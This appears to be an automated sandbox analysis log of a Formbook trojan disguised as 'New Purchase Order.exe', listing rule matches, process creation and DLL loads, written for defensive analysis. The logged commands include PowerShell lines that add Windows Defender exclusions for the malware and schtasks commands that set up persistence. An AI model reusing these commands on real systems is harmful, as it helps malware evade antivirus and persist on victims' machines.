            Source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hbaiQWstL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SRCqlIJcgwJZFuosxj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SRCqlIJcgwJZFuosxj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SRCqlIJcgwJZFuosxj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@8/6
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\hbaiQWstL.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMutant created: \Sessions\1\BaseNamedObjects\sxREZFUdzxCrbaDpfWuO
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBCD4.tmpJump to behavior
            Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: New Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: setupugc.exe, 00000011.00000003.2580907005.0000000003221000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3376763818.0000000003216000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3376763818.0000000003244000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2574961436.0000000003216000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: New Purchase Order.exeVirustotal: Detection: 32%
            Source: New Purchase Order.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile read: C:\Users\user\Desktop\New Purchase Order.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe C:\Users\user\AppData\Roaming\hbaiQWstL.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: edputil.dllJump to behavior
